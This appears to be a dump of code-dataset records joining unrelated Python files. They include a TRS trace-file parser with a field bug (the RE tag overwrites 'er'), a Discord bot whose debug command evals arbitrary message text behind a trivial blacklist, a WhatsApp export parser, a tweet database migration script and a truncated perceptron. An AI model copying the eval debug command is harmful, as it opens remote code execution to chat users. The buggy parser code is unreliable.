TrsTraceSetHeaderConstant.CL:\n self.cl = _unpack_u_int4(value)\n elif tag == TrsTraceSetHeaderConstant.OS:\n self.os = _unpack_float(value)\n elif tag == TrsTraceSetHeaderConstant.II:\n self.ii = _unpack_float(value)\n elif tag == TrsTraceSetHeaderConstant.AI:\n self.ai = _unpack_str(value)\n elif tag == TrsTraceSetHeaderConstant.FT:\n self.ft = _unpack_u_int4(value)\n elif tag == TrsTraceSetHeaderConstant.FF:\n self.ff = _unpack_float(value)\n elif tag == TrsTraceSetHeaderConstant.FR:\n self.fr = _unpack_float(value)\n elif tag == TrsTraceSetHeaderConstant.EU:\n self.eu = _unpack_bool(value)\n elif tag == TrsTraceSetHeaderConstant.ET:\n self.et = _unpack_float(value)\n elif tag == TrsTraceSetHeaderConstant.EM:\n self.em = _unpack_u_int4(value)\n elif tag == TrsTraceSetHeaderConstant.EP:\n self.ep = _unpack_u_int4(value)\n elif tag == TrsTraceSetHeaderConstant.ER:\n self.er = _unpack_u_int4(value)\n elif tag == TrsTraceSetHeaderConstant.RE:\n self.er = _unpack_bool(value)\n elif tag == TrsTraceSetHeaderConstant.EF:\n self.ef = _unpack_float(value)\n elif tag == TrsTraceSetHeaderConstant.EB:\n self.eb = _unpack_u_int4(value)\n else:\n pass\n\n def to_string(self):\n return \\\n ('nt:\\t', self.nt), \\\n ('ns:\\t', self.ns), \\\n ('sc:\\t', self.sc.type), \\\n ('sc:\\t', self.sc.length), \\\n ('ds:\\t', self.ds), \\\n ('ts:\\t', self.ts), \\\n ('gt:\\t', self.gt), \\\n ('dc:\\t', self.dc), \\\n ('xo:\\t', self.xo), \\\n ('xl:\\t', self.xl), \\\n ('yl:\\t', self.yl), \\\n ('xs:\\t', self.xs), \\\n ('ys:\\t', self.ys), \\\n ('to:\\t', self.to), \\\n ('ls:\\t', self.ls), \\\n ('rg:\\t', self.rg), \\\n ('cl:\\t', self.cl), \\\n ('os:\\t', self.os), \\\n ('ii:\\t', self.ii), \\\n ('ai:\\t', self.ai), \\\n ('ft:\\t', self.ft), \\\n ('ff:\\t', self.ff), \\\n ('fr:\\t', self.fr), \\\n ('eu:\\t', self.eu), \\\n ('et:\\t', self.et), \\\n ('em:\\t', self.em), \\\n ('ep:\\t', self.ep), \\\n ('er:\\t', self.er), \\\n ('re:\\t', self.re), \\\n ('ef:\\t', self.ef), \\\n ('eb:\\t', self.eb)\n\n\nclass TrsTraceSetAttribute(object):\n def __init__(self):\n self.headerLen = 0 # type: int\n self.traceLen = 0 # type: int\n self.header = None # type: TrsTraceSetHeader\n\n def to_string(self):\n return \\\n ('header', self.headerLen), \\\n ('trace', self.traceLen), \\\n (self.header.to_string())\n\n\nclass TrsSampleCoding(object):\n def __init__(self, value: int):\n if value is not None:\n self.isFloat = value & 0x10 == 0x10\n self.type = 'float' if self.isFloat else 'int'\n self.length = value & 0xF\n\n\nclass TrsTraceSetHeaderConstant(object):\n \"\"\"\n Reference K Trace set coding>\n \"\"\"\n NT = b'\\x41' # M int 4 Number of traces\n NS = b'\\x42' # M int 4 Number of samples per trace\n SC = b'\\x43' # M byte 1 Sample Coding (see table )\n DS = b'\\x44' # O short 2 0 Length of cryptographic data included in trace\n TS = b'\\x45' # O byte 1 0 Title space reserved per trace\n GT = b'\\x46' # O byte[] variable “trace” Global trace title\n DC = b'\\x47' # O byte[] variable None Description\n XO = b'\\x48' # O int 4 0 Offset in X-axis for trace representation\n XL = b'\\x49' # O byte[] variable None Label of X-axis\n YL = b'\\x4A' # O byte[] variable None Label of Y-axis\n XS = b'\\x4B' # O float 4 1 Scale value for X-axis\n YS = b'\\x4C' # O float 4 1 Scale value for Y-axis\n TO = b'\\x4D' # O int 4 0 Trace offset for displaying trace numbers\n LS = b'\\x4E' # O byte 1 0 Logarithmic scale\n RG = b'\\x55' # O float 4 0 Range of the scope used to perform acquisition\n CL = b'\\x56' # O int 4 0 Coupling of the scope used to perform acquisition\n OS = b'\\x57' # O float 4 0 Offset of the scope used to perform acquisition\n II = b'\\x58' # O float 4 0 Input impedance of the scope used to perform acquisition\n AI = b'\\x59' # O byte[] variable Device ID of the scope used to perform acquisition\n FT = b'\\x5A' # O int 4 0 The type of filter used during acquisition\n FF = b'\\x5B' # O float 4 0 Frequency of the filter used during acquisition\n FR = b'\\x5C' # O float 4 0 Range of the filter used during acquisition\n TB = b'\\x5F' # M none 0 Trace block marker: an empty TLV that marks the end of the header\n EU = b'\\x60' # O boolean 1 false External clock used\n ET = b'\\x61' # O float 4 0 External clock threshold\n EM = b'\\x62' # O int 4 0 External clock multiplier\n EP = b'\\x63' # O int 4 0 External clock phase shift\n ER = b'\\x64' # O int 4 0 External clock resampler mask\n RE = b'\\x65' # O boolean 1 0 External clock resampler enabled\n EF = b'\\x66' # O float 4 0 External clock frequency\n EB = b'\\x67' # O int 4 0 External clock time base\n\n\nclass TrsTrace(object):\n def __init__(self):\n self.dataX = None # type:typing.List\n self.dataY = None # type:typing.List\n self.cryptographicData = None\n self.title = None\n\n\nclass TrsTraceSet(TraceSet):\n\n def __init__(self, path, read=True):\n super().__init__(path)\n\n def getFilePath(self) -> str:\n return self.path\n\n def getTitle(self) -> str:\n return self.trsAttr.header.gt\n\n def getTraceCount(self) -> int:\n return self.trsAttr.header.nt\n\n def getTrace(self, index: int, region_x: typing.List = None) -> Trace:\n trsTrace = self.traces.get(index)\n if trsTrace is None:\n trsTrace = TrsParser.parseTrace(self.file, index, self.getTrsAttribute())\n self.traces[index] = trsTrace\n trace = Trace(index, trsTrace.dataX, trsTrace.dataY,\n scalaX=self.trsAttr.header.xs,\n scalaY=self.trsAttr.header.ys,\n labelX=self.trsAttr.header.xl,\n labelY=self.trsAttr.header.yl,\n title=trsTrace.title,\n cryptographicData=trsTrace.cryptographicData)\n return trace\n\n def destroy(self):\n if not self.file.closed:\n self.file.close()\n\n def getHeader(self):\n return self.trsAttr.header\n\n def getTrsAttribute(self):\n return self.trsAttr\n\n def getAttribute(self) -> TraceSetAttribute:\n attr = TraceSetAttribute()\n # trsAttr = self.getTrsAttribute()\n header = self.getTrsAttribute().header\n # samples\n attr.sampleFirst = 0 # TODO 在哪里指定的\n attr.sampleNumber = header.ns\n attr.sampleSize = True if header.sc.isFloat else header.sc.length\n attr.sampleSign = True # TODO 在哪里指定的\n attr.sampleByteOrder = False # TODO 在哪里指定的\n # traces\n attr.traceFirst = 0 # TODO 在哪里指定的\n attr.traceNumber = header.nt\n attr.traceDataSpace = header.ds\n attr.traceTitleSpace = header.ts\n attr.traceYLabel = header.yl\n attr.traceYScale = header.ys\n attr.traceXLabel = header.xl\n attr.traceXScale = header.xs\n attr.traceXOffset = header.xo\n # global strings\n attr.globalTraceTitle = header.gt\n attr.globalDescription = header.dc\n return attr\n\n def read(self):\n self.file = open(self.path, 'rb')\n self.traces = {}\n self.trsAttr = TrsParser.parseAttribute(self.file) # type:TrsTraceSetAttribute\n\n def write(self):\n self.file = open(self.path, 'w+b')\n self.traces = {}\n\n\nclass TrsParser(object):\n\n @staticmethod\n def parseAttribute(file: typing.BinaryIO) -> TrsTraceSetAttribute:\n header = TrsTraceSetHeader()\n attribute = TrsTraceSetAttribute()\n tag = file.read(1)\n attribute.headerLen += 1\n while tag != TrsTraceSetHeaderConstant.TB:\n lenBytes = file.read(1)\n attribute.headerLen += 1\n if lenBytes[0] & 0x80 == 0x80:\n lenLen = lenBytes[0] & 0x7f\n lenBytes = file.read(lenLen)\n attribute.headerLen += lenLen\n valueLen = _unpack_u_int(lenBytes)\n value = file.read(valueLen)\n attribute.headerLen += valueLen\n header.update(tag, value)\n tag = file.read(1)\n attribute.headerLen += 1\n attribute.headerLen += 1\n attribute.traceLen = header.ns * header.sc.length + header.ds + header.ts\n attribute.header = header\n return attribute\n\n @staticmethod\n def parseTrace(file: typing.BinaryIO, index: int, attribute: TrsTraceSetAttribute) -> TrsTrace:\n \"\"\"\n 返回TrsTrace对象,只包含Y轴集合\n :param file: 解析的文件\n :param index: 曲线索引\n :param attribute: 曲线集合属相\n :return: 曲线对象\n \"\"\"\n s = datetime.now()\n logger.debug('parse trace data %s', s)\n file.seek(attribute.headerLen + attribute.traceLen * index)\n trace = TrsTrace()\n trace.title = _unpack_str(file.read(attribute.header.ts))\n trace.cryptographicData = file.read(attribute.header.ds)\n bs = file.read(attribute.header.sc.length * attribute.header.ns)\n trace.dataY = _unpack_num(bs, attribute.header.sc.length, attribute.header.sc.isFloat, attribute.header.ns)\n logger.debug('parse trace data <<< %s', datetime.now() - s)\n return trace\n","sub_path":"inspector/trace/TrsTrace.py","file_name":"TrsTrace.py","file_ext":"py","file_size_in_byte":14974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"436586523","text":"#coding=utf-8\nimport discord\nimport os.path\nimport traceback\nimport math\nimport cmath\n\nPATH='.\\login.ini'\n\nif os.path.isfile(PATH) and os.access(PATH, os.R_OK):\n import ConfigParser\n config = ConfigParser.ConfigParser()\n config.readfp(open(PATH))\n discord_user_id = config.get(\"login\", \"userid\")\nelse:\n discord_user_id = 'user_id'\n\ndef debug(client, message):\n if(message.content.startswith('::debug')):\n debugcode = message.content[len(\"::debug \"):].strip()\n if debugcode.rfind(\"client.logout()\") != -1:\n debugcode = 'InvalidDebugCode : Invalid Input to this Debug Command.'\n client.send_message(message.channel, \"```py\\n\" + debugcode + \"\\n```\")\n elif debugcode.rfind(\"os._exit(\") != -1:\n debugcode = 'InvalidDebugCode : Invalid Input to this Debug Command.'\n client.send_message(message.channel, \"```py\\n\" + debugcode + \"\\n```\")\n else:\n try:\n debugcode = eval(debugcode)\n except Exception as e:\n debugcode = traceback.format_exc()\n debugcode = str(debugcode)\n client.send_message(message.channel, \"```py\\n\" + debugcode + \"\\n```\")","sub_path":"DecoraterBotCore/Debug.py","file_name":"Debug.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"164409175","text":"class Queue:\r\n def __init__(self):\r\n self.items = []\r\n\r\n def isEmpty(self):\r\n if len(self.items)==0:\r\n print(\"Queue is empty.\")\r\n else:\r\n print(\"Queue isn't empty.\")\r\n\r\n def enqueue(self, item):\r\n self.items.append(item)\r\n\r\n def dequeue(self):\r\n if len(self.items) == 0:\r\n print(\"Queue is empty.\")\r\n else:\r\n return self.items.pop(0)\r\n\r\n def size(self):\r\n return print(len(self.items))\r\n\r\n def print_queue(self):\r\n print(self.items)\r\n\r\nq = Queue()\r\nq.enqueue(\"1\")\r\nq.enqueue(\"2\")\r\nq.enqueue(\"3\")\r\nq.print_queue()\r\nq.dequeue()\r\nq.print_queue()\r\nq.size()\r\nq.dequeue()\r\nq.dequeue()\r\nq.isEmpty()\r\n\r\n\r\n","sub_path":"Datastructures/queue.py","file_name":"queue.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"256398742","text":"import os\nfrom models import *\nfrom datetime import timedelta, datetime\nfrom parsers.parser_base import ParserBase\nfrom dateutil import parser\nimport re\nfrom helpers_cmd import instruct_continue\nimport codecs\nfrom helpers_cmd import progress\nfrom PyInquirer import style_from_dict, Token, prompt, Separator\n\nstyle = style_from_dict({\n Token.Separator: '#cc5454',\n Token.QuestionMark: '#673ab7 bold',\n Token.Selected: '#cc5454', # default\n Token.Pointer: '#673ab7 bold',\n Token.Instruction: '', # default\n Token.Answer: '#f44336 bold',\n Token.Question: '',\n})\n\n# This software was developed to parse SPI collected data from GB Whatsapp to s-report DB format\n\n\nclass SPIParser(ParserBase):\n def __init__(self):\n self.expressions = [\n (r'(?P(\\d{2}/\\d{2}/\\d{2})?\\s(\\d{1,2}:\\d{2} ((PM)|(AM))))?\\s?(-(?P.*?):)?\\s?(?P.*)',\n r'((\\d{2}/\\d{2}/\\d{2})?\\s(\\d{1,2}:\\d{2} ((PM)|(AM))))', '%d/%m/%y %I:%M %p'),\n (r'(?P(\\d{2}/\\d{2}/\\d{4})?\\s(\\d{1,2}:\\d{2}))?\\s?(-(?P.*?):)?\\s?(?P.*)',\n r'((\\d{2}/\\d{2}/\\d{4})?\\s(\\d{1,2}:\\d{2}))', '%d/%m/%Y %H:%M')\n ]\n self.percentual = 0.8\n self.exp = None\n # self.exp = r'((\\d{2}/\\d{2}/\\d{2})?\\s(\\d{1,2}:\\d{2} ((PM)|(AM))))?\\s?(-.*?:)?\\s?(.*)'\n # self.exp_split_marker = r'((\\d{2}/\\d{2}/\\d{2})?\\s(\\d{1,2}:\\d{2} ((PM)|(AM))))'\n self.att_path = \"anexos_whatsapp_spi\"\n self.chats_path = \"conversas_whatsapp_spi\"\n\n\n def choose_exp(self):\n exps = {item[1]: item for item in self.expressions}\n questions = [\n {\n 'type': 'list',\n 'message': 'Selecione uma expressão regular: ',\n 'name': 'exp',\n 'pageSize': 3,\n 'choices': exps.keys()\n }\n ]\n res = prompt(questions, style=style)['exp']\n self.exp = exps[res]\n\n\n def read_chat(self, filename):\n with codecs.open(os.path.join(self.chats_path, filename), 'r', 'utf-8') as f:\n text = f.read()\n\n # Analisa qual das expressões regulares funcionam melhor\n lines = text.split(\"\\n\")\n n = len(lines)\n i = 0\n self.exp = None\n for exp in self.expressions:\n for line in lines:\n if re.match(exp[1], line):\n i += 1\n if i/n >= self.percentual:\n self.exp = exp\n break\n if self.exp is not None:\n break\n\n if self.exp is not None:\n chat = Chat()\n chat.name = os.path.basename(filename)[:-4]\n chat.source = \"Whatsapp\"\n chat.deleted_state = \"Intact\"\n self.add(chat)\n\n message_text = re.sub(self.exp[1], r'\\1', text)\n splitted_text = message_text.split('')[1:]\n for msg_raw in splitted_text:\n result = self.line2message(msg_raw)\n if not result:\n continue\n msg = Message()\n if result['from']:\n p = self.add_participant(\n result['from'], result['from']) # participante\n msg.from_ = p\n if not p in chat.participants:\n chat.participants.append(p)\n msg.body = result['body']\n msg.deleted_state = \"Intact\"\n attachment_regex = r'(.*\\..{3,4}\\s+){1}(?:\\(.*\\)){1}'\n regex_test = re.search(attachment_regex, msg.body)\n if regex_test:\n attachment_regex_valitade = r'(.*\\..{3,4}\\s+)'\n regex_test = re.search(attachment_regex, msg.body).groups()\n validate = re.search(\n attachment_regex_valitade, regex_test[0])\n if validate:\n validate = validate.string\n validate = validate.strip()\n validate = validate[1:]\n validate = os.path.join(self.att_path, validate)\n if os.path.exists(validate):\n attachment = File()\n attachment.extracted_path = str(validate)\n attachment.filename = os.path.basename(\n attachment.extracted_path)\n attachment.size = os.path.getsize(\n attachment.extracted_path)\n self.add(attachment)\n msg.attachments.append(attachment)\n\n if result['timestamp']:\n try:\n date = datetime.strptime(\n result['timestamp'], self.exp[2])\n msg.timestamp = date\n except:\n pass\n self.add(msg)\n chat.messages.append(msg)\n self.add(chat)\n self.commit()\n\n def check_env(self):\n msgs = []\n return msgs\n\n def run(self):\n if not os.path.exists(self.chats_path):\n os.mkdir(self.chats_path)\n if not os.path.exists(self.att_path):\n os.mkdir(self.att_path)\n instruct_continue(\n f\"Mova os arquivos que tem o texto das mensagens para a pasta '{self.chats_path}' e os anexos para a pasta '{self.att_path}'\")\n self.lista = self.getChatsFilename()\n print(\"Lendo chats...\")\n n = len(self.lista)\n for i, item in enumerate(self.lista):\n print(f\"\\nLendo conversa '{item}'\")\n progress(i, n)\n self.read_chat(item)\n\n def getChatsFilename(self):\n return os.listdir(self.chats_path)\n\n def line2message(self, message):\n result = re.search(self.exp[0], message, flags=re.DOTALL)\n if result:\n timestamp = result.group('timestamp')\n from_ = result.group('from')\n body = result.group('body')\n return {\n 'timestamp': timestamp.strip() if timestamp else '',\n 'from': from_.strip() if from_ else '',\n 'body': body.strip() if body else ''\n }\n\n # this must receive an array in the following scheme -> [(str) date_time, msg_from (str), msg(str)]\n # def populate_message_table(self, message_block):\n # date = datetime.strptime(message_block[0], '%d/%m/%y %I:%M %p')\n # participant = message_block[1]\n # msg = message_block[2]\n\n def add_participant(self, identifier, name):\n participant = db_session.query(Participant).filter(\n Participant.identifier == identifier, Participant.name == name).first()\n if not participant:\n participant = Participant()\n participant.identifier = identifier\n participant.name = name\n self.add(participant)\n self.commit()\n return participant\n","sub_path":"parsers/spi2db/spi2db.py.bd9172253dae44b6968dbfdb47f1fd6d.py","file_name":"spi2db.py.bd9172253dae44b6968dbfdb47f1fd6d.py","file_ext":"py","file_size_in_byte":7034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"163317799","text":"import concurrent.futures as cf\nfrom sqlalchemy import *\nfrom sqlalchemy.orm import sessionmaker, scoped_session\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom pprint import pprint\nfrom datetime import datetime\n\nPG_DBNAME = ''\nPG_USER = ''\nPG_PASSWORD = ''\nMY_DBNAME = ''\nMY_USER = ''\nMY_PASWORD = ''\nDB_HOST = ''\n\nmy_config = {'username': MY_USER, 'password': MY_PASWORD, 'database': MY_DBNAME, 'host': DB_HOST}\npg_config = {'username': PG_USER, 'password': PG_PASSWORD, 'database': PG_DBNAME, 'host': DB_HOST}\n\nfinal_code = \"mysql://{username}:{password}@{host}:3306/{database}\".format(**my_config)\npg_dsn = \"postgresql+psycopg2://{username}@{host}:5432/{database}\".format(**pg_config)\n\nBase = declarative_base()\nsrc = create_engine(final_code, pool_recycle=180)\ndst = create_engine(pg_dsn)\npg_meta = MetaData(bind=dst, schema=\"fintweet\")\nmy_meta = MetaData(bind=src)\n\n\n# Reflect destination tables\n\nclass MyUsers(Base):\n __table__ = Table('user', my_meta, autoload=True)\n\n\nclass MyUsersCount(Base):\n __table__ = Table('user_count', my_meta, autoload=True)\n\n\nclass MyTweets(Base):\n __table__ = Table('tweet', my_meta, autoload=True)\n\n\nclass MyTweetCounts(Base):\n __table__ = Table('tweet_count', my_meta, autoload=True)\n\n\nclass MyTweetCashtags(Base):\n __table__ = Table('tweet_cashtags', my_meta, autoload=True)\n\n\nclass MyTweetHashtags(Base):\n __table__ = Table('tweet_hashtags', my_meta, autoload=True)\n\n\nclass MyTweetMentions(Base):\n __table__ = Table('tweet_mentions', my_meta, autoload=True)\n\n\nclass MyTweetUrls(Base):\n __table__ = Table('tweet_url', my_meta, autoload=True)\n\n\n# class MyPermno(Base):\n# __table__ = Table('permno', my_meta, autoload=True)\n\n\nclass PgUsers(Base):\n __table__ = Table('user', pg_meta, autoload=True)\n\n\nclass PgUsersCount(Base):\n __table__ = Table('user_count', pg_meta, autoload=True)\n\n\nclass PgTweets(Base):\n __table__ = Table('tweet', pg_meta, autoload=True)\n\n\nclass PgTweetCounts(Base):\n __table__ = Table('tweet_count', pg_meta, autoload=True)\n\n\nclass PgTweetCashtags(Base):\n __table__ = Table('tweet_cashtags', pg_meta, autoload=True)\n\n\nclass PgTweetHashtags(Base):\n __table__ = Table('tweet_hashtags', pg_meta, autoload=True)\n\n\nclass PgTweetMentions(Base):\n __table__ = Table('tweet_mentions', pg_meta, autoload=True)\n\n\nclass PgTweetUrls(Base):\n __table__ = Table('tweet_url', pg_meta, autoload=True)\n\n\n# Create a session to use the tables\nSrcSession = sessionmaker(bind=src)\nsession_factory = sessionmaker(dst, autocommit=True, autoflush=True)\n# DstSession = scoped_session(session_factory)\nDstSession = sessionmaker(bind=dst)\n\nsrcssn = SrcSession()\ndstssn = DstSession()\n\n\ndef transfer_user(row):\n try:\n dstssn = DstSession()\n print(\"Inserting user:\", row.user_id)\n item = PgUsers(\n user_id=row.user_id,\n twitter_handle=row.twitter_handle,\n user_name=row.user_name,\n location=row.location,\n date_joined=row.date_joined,\n timezone=row.timezone,\n website=row.website,\n user_intro=row.user_intro,\n verified=row.verified\n )\n dstssn.add(item)\n dstssn.commit()\n\n except BaseException as e:\n print(str(e))\n raise\n\n\ndef transfer_user_count(row):\n try:\n dstssn = DstSession()\n print(\"Inserting count for user_id:\", row.user_id)\n item = PgUsersCount(\n user_id=row.user_id,\n follower=row.follower,\n following=row.following,\n tweets=row.tweets,\n likes=row.likes\n )\n dstssn.add(item)\n dstssn.commit()\n\n except BaseException as e:\n print(str(e))\n raise\n\n\ndef transfer_tweets(row):\n try:\n dstssn = DstSession()\n print(\"Inserting tweet with tweet_id:\", row.tweet_id)\n item = PgTweets(\n tweet_id=row.tweet_id,\n date=row.date,\n time=row.time,\n timezone=row.timezone,\n retweet_status=row.retweet_status,\n text=row.text,\n location=row.location,\n user_id=row.user_id,\n emoticon=row.emoticon\n )\n dstssn.add(item)\n dstssn.commit()\n\n except BaseException as e:\n print(str(e))\n raise\n\n\ndef transfer_tweet_counts(row):\n try:\n dstssn = DstSession()\n print(\"Inserting tweet count with tweet_id:\", row.tweet_id)\n item = PgTweetCounts(\n tweet_id=row.tweet_id,\n reply=row.reply,\n retweet=row.retweet,\n favorite=row.favorite\n )\n dstssn.add(item)\n dstssn.commit()\n\n except BaseException as e:\n print(str(e))\n raise\n\n\ndef transfer_tweet_cashtags(row):\n try:\n dstssn = DstSession()\n print(\"Inserting cashtags with tweet_id:\", row.tweet_id)\n item = PgTweetCashtags(\n tweet_id=row.tweet_id,\n cashtags=row.cashtags\n )\n dstssn.add(item)\n dstssn.commit()\n\n except BaseException as e:\n print(str(e))\n raise\n\n\ndef transfer_tweet_hashtags(row):\n try:\n dstssn = DstSession()\n print(\"Inserting hashtags with tweet_id:\", row.tweet_id)\n item = PgTweetHashtags(\n tweet_id=row.tweet_id,\n hashtags=row.hashtags\n )\n dstssn.add(item)\n dstssn.commit()\n\n except BaseException as e:\n print(str(e))\n raise\n\n\ndef transfer_tweet_mentions(row):\n try:\n dstssn = DstSession()\n print(\"Inserting mentions with tweet_id:\", row.tweet_id)\n item = PgTweetMentions(\n tweet_id=row.tweet_id,\n mentions=row.mentions,\n user_id=row.user_id\n )\n dstssn.add(item)\n dstssn.commit()\n\n except BaseException as e:\n print(str(e))\n raise\n\n\ndef transfer_tweet_urls(row):\n try:\n dstssn = DstSession()\n print(\"Inserting urls with tweet_id:\", row.tweet_id)\n item = PgTweetUrls(\n tweet_id=row.tweet_id,\n url=row.url,\n link=row.link\n )\n dstssn.add(item)\n dstssn.commit()\n\n except BaseException as e:\n print(str(e))\n raise\n\n\nif __name__ == '__main__':\n # for my_user in srcssn.query(MyUsers).execution_options(stream_results=True).yield_per(200):\n # pg_user=dstssn.query(PgUsers).filter_by(user_id=my_user.user_id).first()\n # if pg_user is None:\n # transfer_user(my_user)\n #\n # for my_user_count in srcssn.query(MyUsersCount).execution_options(stream_results=True).yield_per(200):\n # pg_user_count=dstssn.query(PgUsersCount).filter_by(user_id=my_user_count.user_id).first()\n # if pg_user_count is None:\n # transfer_user_count(my_user_count)\n\n # for my_tweet in srcssn.query(MyTweets).execution_options(stream_results=True).yield_per(20):\n # pg_tweet=dstssn.query(PgTweets).filter_by(tweet_id=my_tweet.tweet_id).first()\n # if pg_tweet is None:\n # transfer_tweets(my_tweet)\n\n # for my_cashtag in srcssn.query(MyTweetCashtags).filter(MyTweetCashtags.tweet_id>749853111913558016).order_by(MyTweetCashtags.tweet_id.asc()).execution_options(stream_results=True).yield_per(50):\n # pg_cashtag=dstssn.query(PgTweetCashtags)\\\n # .filter_by(tweet_id=my_cashtag.tweet_id)\\\n # .filter_by(cashtags=my_cashtag.cashtags)\\\n # .first()\n # if pg_cashtag is None:\n # transfer_tweet_cashtags(my_cashtag)\n # else:\n # print('Cashtag entry', pg_cashtag.cashtags, 'for tweet_id', pg_cashtag.tweet_id, 'exsists')\n\n # for my_hashtag in srcssn.query(MyTweetHashtags).filter(MyTweetHashtags.tweet_id>803779963203657728).order_by(MyTweetHashtags.tweet_id.asc()).execution_options(stream_results=True).yield_per(10):\n # pg_hashtag=dstssn.query(PgTweetHashtags)\\\n # .filter_by(tweet_id=my_hashtag.tweet_id)\\\n # .filter_by(hashtags=my_hashtag.hashtags)\\\n # .first()\n # if pg_hashtag is None:\n # transfer_tweet_hashtags(my_hashtag)\n # else:\n # print('Hashtag entry', pg_hashtag.hashtags, 'for tweet_id', pg_hashtag.tweet_id, 'exsists')\n\n # for my_mentions in srcssn.query(MyTweetMentions).filter(MyTweetMentions.tweet_id>629296708963319808).order_by(MyTweetMentions.tweet_id.asc()).execution_options(stream_results=True).yield_per(20):\n # pg_mentions=dstssn.query(PgTweetMentions)\\\n # .filter_by(tweet_id=my_mentions.tweet_id)\\\n # .filter_by(mentions=my_mentions.mentions)\\\n # .first()\n # if pg_mentions is None:\n # transfer_tweet_mentions(my_mentions)\n # else:\n # print('Mentions entry', pg_mentions.mentions, 'for tweet_id', pg_mentions.tweet_id, 'exsists')\n\n # for my_tweet_count in srcssn.query(MyTweetCounts).filter(MyTweetCounts.tweet_id>768752069830250500).order_by(MyTweetCounts.tweet_id.asc()).execution_options(stream_results=True).yield_per(20):\n # pg_tweet_count=dstssn.query(PgTweetCounts).filter_by(tweet_id=my_tweet_count.tweet_id).first()\n # if pg_tweet_count is None:\n # transfer_tweet_counts(my_tweet_count)\n # else:\n # print('Count entry for tweet_id', pg_tweet_count.tweet_id, 'exsists')\n\n for my_urls in srcssn.query(MyTweetUrls).filter(MyTweetUrls.tweet_id > 649640455542452224).order_by(\n MyTweetUrls.tweet_id.asc()).execution_options(stream_results=True).yield_per(20):\n pg_urls = dstssn.query(PgTweetUrls) \\\n .filter_by(tweet_id=my_urls.tweet_id) \\\n .filter_by(url=my_urls.url) \\\n .first()\n if pg_urls is None:\n transfer_tweet_urls(my_urls)\n else:\n print('Url entry', pg_urls.url, 'for tweet_id', pg_urls.tweet_id, 'exsists')\n\n # tweets = srcssn.query(MyTweets).yield_per(200).enable_eagerloads(False)\n # with cf.ThreadPoolExecutor(max_workers=4) as executor:\n # try:\n # executor.map(transfer_tweets, tweets)\n # except BaseException as e:\n # print(str(e))\n # raise\n # del tweets\n #\n # tweet_counts = srcssn.query(MyTweetCounts).yield_per(1000).enable_eagerloads(False)\n # with cf.ThreadPoolExecutor(max_workers=4) as executor:\n # try:\n # executor.map(transfer_tweet_counts, tweet_counts)\n # except BaseException as e:\n # print(str(e))\n # raise\n # del tweet_counts\n #\n # tweet_cashtags = srcssn.query(MyTweetCashtags).yield_per(1000).enable_eagerloads(False)\n # with cf.ThreadPoolExecutor(max_workers=4) as executor:\n # try:\n # executor.map(transfer_tweet_cashtags, tweet_cashtags)\n # except BaseException as e:\n # print(str(e))\n # raise\n # del tweet_cashtags\n #\n # tweet_hashtags = srcssn.query(MyTweetHashtags).yield_per(1000).enable_eagerloads(False)\n # with cf.ThreadPoolExecutor(max_workers=4) as executor:\n # try:\n # executor.map(transfer_tweet_hashtags, tweet_hashtags)\n # except BaseException as e:\n # print(str(e))\n # raise\n # del tweet_hashtags\n #\n # tweet_mentions = srcssn.query(MyTweetMentions).yield_per(1000).enable_eagerloads(False)\n # with cf.ThreadPoolExecutor(max_workers=4) as executor:\n # try:\n # executor.map(transfer_tweet_mentions, tweet_mentions)\n # except BaseException as e:\n # print(str(e))\n # raise\n # del tweet_mentions\n #\n # tweet_urls = srcssn.query(MyTweetUrls).yield_per(1000).enable_eagerloads(False)\n # with cf.ThreadPoolExecutor(max_workers=4) as executor:\n # try:\n # executor.map(transfer_tweet_urls, tweet_urls)\n # except BaseException as e:\n # print(str(e))\n # raise\n\n print(\"ALL DONE.\")\n","sub_path":"custom_scripts/migration_tools/transfer_final_code.py","file_name":"transfer_final_code.py","file_ext":"py","file_size_in_byte":11752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"17598462","text":"import numpy as np\n\n\nclass Perceptron:\n def __init__(self, w: np.ndarray = None, target_classes: np.ndarray = None):\n self.w = w\n self.target_classes = target_classes\n\n def fit(self, X: np.ndarray, y: np.ndarray, MAX_GUESSES=100_000) -> None:\n \"\"\"Learn seperating hyperplane for 1-D data\"\"\"\n target_classes = np.unique(y)\n if len(target_classes) != 2:\n raise AssertionError(\"More than two classifiers are present.\")\n y01 = (y == target_classes[1]).astype(\"int64\")\n\n # You can append a row or column by getting the size in that axis\n # using a.shape[axis].\n # I.e. for appending a row, you do np.insert(a, a.shape[0], 999, axis=0)\n # and for a column, you do np.insert(a, a.shape[1], 999, axis=1)\n\n # y = mx + b can also be written as [w b] . [x 1]\n\n # w = [w1 w2 ... wk] ---> [w1, w2, ... wk, b]\n\n # X = [x1,1 x1,2 ... x1,k] [x1,1 x1,2 ... x1,k 1]\n # [x2,1 x2,2 ... x2,k] ---> [x2,1 x2,2 ... x2,k 1]\n # [...] [...]\n # [xN,1 xN,2 ... xN,k] [xN,1 xN,2 ... xN,k 1]\n\n X1 = np.insert(X, X.shape[1], 1, axis=1)\n w = np.repeat(0, X1.shape[1])\n\n i, j = 0, 0\n\n while i < X1.shape[0]:\n\n # Classify X1_i using w\n yhat_i = (np.sign(X1[i].dot(w)) + 1) / 2\n\n # Check if yhat_i is incorrect\n if yhat_i != y01[i]:\n\n # Update the weight array; reset i\n if y01[i] == 1:\n w = w + X1[i]\n else:\n w = w - X1[i]\n i = 0\n\n # If yhat_i is correct\n else:\n\n if (i + 1) == X1.shape[0]:\n print(\"Found a separating hyperplane!\")\n break\n\n else:\n i += 1\n\n # Check if MAX_GUESSES has been reached. If not, increment j\n if j == MAX_GUESSES:\n raise AssertionError(\n \"MAX_GUESSES reached. Data isn't linearly separable\"\n )\n j += 1\n\n # Update object attributes y_classes and w\n self.target_classes = target_classes\n self.w = w\n\n def predict(self, X: np.ndarray) -> np.ndarray:\n \"\"\"Predict on test data\n\n Notes\n -----\n If Xw + b > 0, we predict result as 1\n else we predict result as 0\n \"\"\"\n if self.w is None:\n raise AssertionError(\"Weights are not defined\")\n if 